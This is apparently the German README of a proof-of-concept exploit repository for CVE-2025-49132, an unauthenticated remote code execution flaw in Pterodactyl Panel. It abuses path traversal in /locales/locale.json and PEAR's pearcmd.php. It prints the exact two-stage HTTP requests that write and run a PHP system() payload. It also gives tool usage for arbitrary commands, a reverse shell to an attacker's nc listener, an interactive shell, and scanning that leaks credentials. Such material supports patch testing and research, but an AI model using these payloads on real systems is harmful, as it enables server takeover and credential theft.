
CVE-2025-49132_PHP_PEAR_METHOD
Dieses Repository enthält einen Proof-of-Concept (PoC)-Exploit für CVE-2025-49132, eine kritische Schwachstelle für nicht authentifizierte Remote-Codeausführung in Pterodactyl Panel-Versionen vor 1.11.11.
Pterodactyl Panel ist ein kostenloses, quelloffenes Spielserver-Verwaltungspanel, das mit PHP erstellt wurde. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebige Systembefehle auf dem Zielserver auszuführen, und zwar durch unsachgemäße Handhabung des Endpunkts /locales/locale.json in Kombination mit der pearcmd.php-Funktionalität von PHP PEAR.
PHP PEAR (PHP Extension and Application Repository) ist ein Framework und ein Verteilungssystem für wiederverwendbare PHP-Komponenten. Es stellt ein Befehlszeilentool (pearcmd.php) zur Verfügung, das zur Verwaltung von PEAR-Paketen verwendet werden kann.
Die Datei pearcmd.php verarbeitet Befehle über URL-Parameter und kann in Kombination mit Path Traversal genutzt werden, um:
Die Schwachstelle besteht, weil:
locale in /locales/locale.json ermöglicht Path Traversal ohne ordnungsgemäße Validierungpearcmd.php akzeptiert den Befehl +config-create, der beliebige PHP-Dateien schreiben kannEin Angreifer kann:
config-create missbrauchen, um schädlichen PHP-Code nach /tmp zu schreibenDer Exploit arbeitet in zwei Phasen:
GET /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&<?=system('id')?>+/tmp/payload.php HTTP/1.1
Host: target.com
Aufschlüsselung:
+config-create+/ - Ruft die Konfigurationserstellungsfunktion von PEAR auflocale=../../../../../../usr/share/php/PEAR - Path Traversal zum PEAR-Verzeichnisnamespace=pearcmd - Ziel ist die Datei pearcmd.php<?=system('id')?>+/tmp/payload.php - PHP-Payload und ZieldateiGET /locales/locale.json?locale=../../../../../../tmp&namespace=payload HTTP/1.1
Host: target.com
Aufschlüsselung:
locale=../../../../../../tmp - Path Traversal zum /tmp-Verzeichnisnamespace=payload - Bindet payload.php ein und führt es ausDer Exploit erfordert das Senden von Sonderzeichen (<, >, ?, =) in der URL ohne Kodierung. Wenn diese Zeichen URL-kodiert werden:
<?=system('id')?> wird zu %3C%3F%3Dsystem%28%27id%27%29%3F%3Egraph TD
A[Attacker] -->|1. Path Traversal Request| B[locale.json]
B -->|2. Traverse to PEAR| C[pearcmd.php]
C -->|3. config-create Command| D[Write PHP Payload]
D -->|4. Create File| E[payload.php]
E -->|5. File Created| F[Server Filesystem]
A -->|6. Execution Request| G[locale.json]
G -->|7. Traverse to tmp| E
E -->|8. Include and Execute| H[PHP Interpreter]
H -->|9. System Command| I[Shell Command]
I -->|10. Command Output| A
style A fill:#ff6b6b
style B fill:#4ecdc4
style C fill:#ffe66d
style E fill:#ff6b6b
style H fill:#ff6b6b
style I fill:#ff6b6b
sequenceDiagram
participant Attacker
participant Web Server
participant PEAR
participant Filesystem
participant PHP Engine
Attacker->>Web Server: GET locale.json with config-create
Web Server->>PEAR: Path Traversal to pearcmd
PEAR->>Filesystem: Create payload.php
Filesystem-->>Attacker: 200 OK
Attacker->>Web Server: GET locale.json with payload namespace
Web Server->>Filesystem: Path Traversal to payload.php
Filesystem->>PHP Engine: Include payload
PHP Engine->>PHP Engine: Execute system command
PHP Engine-->>Attacker: Command Output RCE
requests-Bibliothekgit clone https://github.com/xffsec/CVE-2025-49132_PEAR_METHOD.git
cd CVE-2025-49132_PEAR_METHOD
pip3 install -r requirements.txt
Oder manuell:
pip3 install requests
python3 poc.py -H <target_host> -c "<command>"
# On attacker machine, start listener
nc -lvnp 4444
# Execute exploit with reverse shell
python3 poc.py -H <target_host> -r <your_ip>:4444
python3 poc.py -H <target_host> --shell
python3 poc.py -H <target_host> --fuzz
python3 poc.py -H <target_host> --scan
Prüft auf CVE-2025-49132 durch Konfigurationslecks (Datenbank-Anmeldedaten, App-Schlüssel).
python3 poc.py -H <target_host> -c "whoami" -p "/opt/pear"
python3 poc.py -H <target_host> -c "id" -v
Zeigt detaillierten Fortschritt (Payload-Erstellung, PEAR-Pfad, Ausführungsstatus).
usage: poc.py [-h] -H HOST [-c COMMAND] [-r REVERSE_SHELL] [--shell] [--fuzz] [--scan]
[-p PEAR_PATH] [-e ENDPOINT] [--ssl] [--timeout TIMEOUT] [-v]
optional arguments:
-h, --help show this help message and exit
-H HOST, --host HOST Target host (e.g., 192.168.1.100 or example.com)
-c COMMAND Command to execute on target system
-r REVERSE_SHELL Reverse shell (format: LHOST:LPORT)
--shell Interactive pseudo-shell mode
--fuzz Fuzz for PEAR installation paths
--scan Scan target for vulnerability (config leaks)
-p PEAR_PATH Custom PEAR path (default: /usr/share/php/PEAR)
-e ENDPOINT Vulnerable endpoint (default: /locales/locale.json)
--ssl Use HTTPS
--timeout TIMEOUT Request timeout in seconds (default: 10)
-v, --verbose Verbose progress output